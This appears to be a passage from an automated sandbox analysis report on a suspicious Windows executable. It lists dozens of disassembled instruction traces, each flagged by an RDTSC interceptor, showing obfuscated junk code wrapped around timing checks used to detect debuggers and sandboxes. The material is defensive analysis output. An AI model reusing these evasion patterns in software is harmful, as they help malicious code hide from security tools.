Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F9C34 second address: 7F9CA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007FAF7C6A41AAh 0x00000010 pop ebx 0x00000011 nop 0x00000012 sub dword ptr [ebp+1245AF19h], edx 0x00000018 push edi 0x00000019 pushad 0x0000001a mov edi, dword ptr [ebp+122D21D9h] 0x00000020 mov dword ptr [ebp+122D30C2h], ecx 0x00000026 popad 0x00000027 pop edi 0x00000028 push 00000000h 0x0000002a stc 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+122D36A2h] 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 jmp 00007FAF7C6A41B6h 0x0000003a push esi 0x0000003b jo 00007FAF7C6A41A6h 0x00000041 pop esi 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 ja 00007FAF7C6A41ACh 0x0000004c jnl 00007FAF7C6A41A6h 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FAC13 second address: 7FAC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAF7CBD5D36h 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FAF7CBD5D38h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 pushad 0x0000002a adc ch, 0000007Dh 0x0000002d or eax, dword ptr [ebp+122D20B0h] 0x00000033 popad 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FAF7CBD5D38h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov bh, C5h 0x00000052 push 00000000h 0x00000054 movzx ebx, cx 0x00000057 xchg eax, esi 0x00000058 jmp 00007FAF7CBD5D44h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FAC8E second address: 7FAC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FAC93 second address: 7FACA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D3Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FBD54 second address: 7FBD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FBD5C second address: 7FBD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FBD60 second address: 7FBD64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FCC7A second address: 7FCCDF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF7CBD5D45h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAF7CBD5D3Dh 0x00000010 nop 0x00000011 jnl 00007FAF7CBD5D3Ch 0x00000017 push 00000000h 0x00000019 mov bl, ah 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007FAF7CBD5D38h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 cmc 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FCCDF second address: 7FCCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FDC05 second address: 7FDC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FDC0B second address: 7FDC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FDC0F second address: 7FDC31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub di, 6EFAh 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 sub di, AC00h 0x00000016 stc 0x00000017 popad 0x00000018 push 00000000h 0x0000001a mov bl, 9Bh 0x0000001c xchg eax, esi 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FDC31 second address: 7FDC53 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FAF7C6A41B4h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 803CA5 second address: 803CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAF7CBD5D36h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FAF7CBD5D48h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 806A18 second address: 806A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 806A1C second address: 806A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 806A24 second address: 806A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41B4h 0x00000009 jmp 00007FAF7C6A41B9h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 806BB8 second address: 806BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D42h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 806BCE second address: 806BF2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FAF7C6A41B5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 806BF2 second address: 806BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 80E3A5 second address: 80E3CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FAF7C6A41B7h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 80E3CB second address: 80E3DE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAF7CBD5D38h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 80E3DE second address: 80E3FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FAF7C6A41ACh 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jl 00007FAF7C6A41B0h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81313D second address: 81318A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D3Fh 0x00000009 popad 0x0000000a jmp 00007FAF7CBD5D45h 0x0000000f push ecx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 jmp 00007FAF7CBD5D45h 0x00000019 jnc 00007FAF7CBD5D36h 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 812419 second address: 81244E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnp 00007FAF7C6A41A8h 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f jbe 00007FAF7C6A41A6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007FAF7C6A41B4h 0x0000001c popad 0x0000001d pushad 0x0000001e jc 00007FAF7C6A41A6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 812CCF second address: 812CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 812CD3 second address: 812CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 812CDB second address: 812D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FAF7CBD5D36h 0x0000000b jl 00007FAF7CBD5D36h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 ja 00007FAF7CBD5D49h 0x0000001a pushad 0x0000001b jmp 00007FAF7CBD5D3Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81472E second address: 814738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAF7C6A41A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 814738 second address: 81473E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EDAD6 second address: 7EDB6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D18CFh], edx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FAF7C6A41A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 movsx ebx, di 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d jc 00007FAF7C6A41ACh 0x00000043 mov edi, dword ptr [ebp+122D3622h] 0x00000049 mov eax, dword ptr [ebp+122D0605h] 0x0000004f push 00000000h 0x00000051 push edx 0x00000052 call 00007FAF7C6A41A8h 0x00000057 pop edx 0x00000058 mov dword ptr [esp+04h], edx 0x0000005c add dword ptr [esp+04h], 00000019h 0x00000064 inc edx 0x00000065 push edx 0x00000066 ret 0x00000067 pop edx 0x00000068 ret 0x00000069 clc 0x0000006a push FFFFFFFFh 0x0000006c add dword ptr [ebp+122D2860h], edx 0x00000072 push eax 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push edx 0x00000077 pop edx 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F122C second address: 7F1230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F1230 second address: 7F1236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F3134 second address: 7F313A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F313A second address: 7F313E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F3210 second address: 7F3231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jbe 00007FAF7CBD5D38h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7F67C2 second address: 7F684B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF7C6A41B2h 0x0000000b popad 0x0000000c nop 0x0000000d mov ebx, edx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FAF7C6A41A8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007FAF7C6A41A8h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 mov eax, dword ptr [ebp+122D059Dh] 0x00000057 mov edi, dword ptr [ebp+122D2A8Ch] 0x0000005d push FFFFFFFFh 0x0000005f mov bx, 8250h 0x00000063 nop 0x00000064 pushad 0x00000065 push edi 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FBE83 second address: 7FBF17 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7CBD5D38h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FAF7CBD5D38h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 jmp 00007FAF7CBD5D3Fh 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov di, dx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov edi, 13DFC2ABh 0x00000042 mov eax, dword ptr [ebp+122D08ADh] 0x00000048 jns 00007FAF7CBD5D3Bh 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007FAF7CBD5D38h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 00000019h 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e pushad 0x0000006f popad 0x00000070 push eax 0x00000071 pop eax 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FBF17 second address: 7FBF34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAF7C6A41A6h 0x00000009 jne 00007FAF7C6A41A6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jg 00007FAF7C6A41A6h 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FBF34 second address: 7FBF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D42h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FDD9D second address: 7FDDAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41AAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7FEE64 second address: 7FEE91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF7CBD5D38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FAF7CBD5D46h 0x00000013 jp 00007FAF7CBD5D36h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B7F2 second address: 81B7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81A4EF second address: 81A4F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81AA73 second address: 81AA9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AFh 0x00000007 jmp 00007FAF7C6A41ABh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FAF7C6A41B2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81AA9B second address: 81AAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81AAA1 second address: 81AAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41AAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81AC3C second address: 81AC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF7CBD5D47h 0x0000000a pushad 0x0000000b jmp 00007FAF7CBD5D41h 0x00000010 jne 00007FAF7CBD5D36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81A201 second address: 81A205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B091 second address: 81B0A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FAF7CBD5D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B0A1 second address: 81B0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B0A5 second address: 81B0A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B0A9 second address: 81B0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B0AF second address: 81B0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B0B9 second address: 81B0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B0CE second address: 81B0D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B0D8 second address: 81B0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B0DC second address: 81B0E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B236 second address: 81B23B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B23B second address: 81B257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81B525 second address: 81B529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 820E4B second address: 820E50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 820E50 second address: 820E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81FC38 second address: 81FC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D3Dh 0x00000009 jbe 00007FAF7CBD5D36h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FAF7CBD5D3Bh 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81FC60 second address: 81FC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81FC67 second address: 81FC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAF7CBD5D36h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81FC71 second address: 81FCA3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FAF7C6A41B8h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jnp 00007FAF7C6A41B8h 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8200A5 second address: 8200AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8204B3 second address: 8204E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FAF7C6A41B2h 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 je 00007FAF7C6A41A8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jo 00007FAF7C6A41A8h 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
